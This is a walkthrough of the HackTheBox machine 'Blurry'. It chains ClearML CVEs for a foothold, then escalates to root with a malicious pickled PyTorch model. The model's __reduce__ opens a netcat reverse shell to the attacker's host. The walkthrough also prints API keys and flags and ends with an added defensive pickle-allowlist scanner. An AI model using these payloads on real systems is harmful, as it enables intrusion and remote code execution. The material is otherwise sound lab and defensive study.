Blurry - Walkthrough

Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold consists of a series of recently disclosed CVEs in the ClearML suite. The service provides a web platform, a fileserver, and an API, all of which contain vulnerabilities (CVE-2024-24590 - CVE-2024-24595) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with sudo is discovered. The program loads arbitrary PyTorch models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, fickling is used to scan the dataset for insecure pickle files prior to loading the model. Malicious code can be injected into a model, using runpy to bypass the fickling checks.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.19 -oG allPorts

The scan reveals:

PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.19 -oN targeted
  • SSH → OpenSSH 8.4p1 Debian 5+deb11u3
  • HTTP → nginx 1.18.0, redirecting to app.blurry.htb

We add the hostname to /etc/hosts:

sudo sh -c 'echo "10.10.11.19 blurry.htb app.blurry.htb" >> /etc/hosts'

We perform subdomain fuzzing:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://blurry.htb -H "Host: FUZZ.blurry.htb" -fs 169

Discovered subdomains: files, app, chat

app.blurry.htb/dashboard

chat.blurry.htb

The chat subdomain reveals a username: jippity

Foothold

The application runs ClearML, an ML experiment tracking platform. We set up the ClearML client:

sudo apt install python3.11-venv
python3 -m venv .env
source .env/bin/activate
pip install clearml
clearml-init

This reveals API credentials:

api {
  web_server: http://app.blurry.htb
  api_server: http://api.blurry.htb
  files_server: http://files.blurry.htb
  credentials {
    "access_key" = "B0KCP3QYFV1IZFS9SRY2"
    "secret_key" = "I6iImsuAGcxECntt3HZSYwkoMtmoZJ9NYyy0eNGQBQ0Ol3VhMH"
  }
}

ClearML is vulnerable to CVE-2024-24590 (Pre-Auth RCE). We exploit it to gain a shell as jippity:

git clone https://github.com/DemonPandaz2763/CVE-2024-24590.git
cd CVE-2024-24590
python3 exploit.py

User flag captured:

cat user.txt

User flag: 85fdd3c30f09caeb0fd4fa4dbec25fb1

Privilege Escalation

We check sudo privileges:

sudo -l
User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

The /models directory is writable. The script loads and evaluates PyTorch models, which are serialized using pickle. We create a malicious model:

import torch
import torch.nn as nn
import os
 
class Exploit(nn.Module):
    def __init__(self):
        super(Exploit, self).__init__()
        self.dense = nn.Linear(10, 1)
 
    def forward(self, x):
        return self.dense(x)
 
    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 4000 >/tmp/f"
        return os.system, (cmd,)
 
model = Exploit()
torch.save(model, 'exploit.pth')

We host and download the payload:

python3 -m http.server 80
wget http://10.10.14.36/exploit.pth -O /models/exploit.pth

We execute the model evaluator:

sudo /usr/bin/evaluate_model /models/exploit.pth
[+] Model /models/exploit.pth is considered safe. Processing...

Root shell received on our listener:

nc -lvnp 4000

Root flag obtained:

cat /root/root.txt

Root flag: 5175188a6a603edf71faf262642027ca
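
Seen from the defender's side of the evaluate_model step above, this added example (not part of the original walkthrough, and not the code of evaluate_model or fickling) lists every global a model file would import, without loading it, and reports anything outside an allowlist, so an unlisted module such as the runpy mentioned in the summary is reported as well. The ALLOWED set, the function names and the Probe sample are assumptions made for illustration.

```python
import collections, io, os, pickle, pickletools, zipfile

# Assumed allowlist for a plain state_dict checkpoint; extend per model family.
ALLOWED = {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2")}

def pickle_globals(data: bytes):
    """Yield (module, name) per GLOBAL/INST/STACK_GLOBAL, without unpickling."""
    memo, seen = {}, ["?", "?"]  # seen: string pushes; anything else is "?"
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "MEMOIZE" or "PUT" in op.name:
            memo[len(memo) if arg is None else arg] = seen[-1]
        elif op.name in ("GLOBAL", "INST"):
            yield tuple(arg.split(" ", 1))
            seen.append("?")
        elif op.name == "STACK_GLOBAL":
            yield tuple(seen[-2:])  # operands are the two values pushed last
            seen.append("?")
        elif "GET" in op.name:
            seen.append(memo.get(arg, "?"))
        else:
            seen.append(arg if isinstance(arg, str) else "?")

def model_pickles(blob: bytes):
    """Return the pickle streams of a torch.save zip archive or a raw pickle."""
    if zipfile.is_zipfile(io.BytesIO(blob)):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return [zf.read(n) for n in zf.namelist() if n.endswith(".pkl")]
    return [blob]

def disallowed_globals(blob: bytes):
    """Sorted list of referenced globals that are not on the allowlist."""
    return sorted({g for p in model_pickles(blob)
                   for g in pickle_globals(p) if g not in ALLOWED})

class Probe:
    """Constructed sample: __reduce__ names a harmless callable (os.getpid)."""
    def __reduce__(self):
        return os.getpid, ()

def as_archive(pkl: bytes) -> bytes:
    """Wrap a pickle the way torch.save lays it out: <name>/data.pkl in a zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pkl)
    return buf.getvalue()

if __name__ == "__main__":
    for pkl in (pickle.dumps(collections.OrderedDict(w=[0.1])), pickle.dumps(Probe())):
        print(disallowed_globals(as_archive(pkl)) or "only allowlisted globals")
```

An empty result means the file references only allowlisted globals; any other entry, including the unresolved marker "?", should block the load.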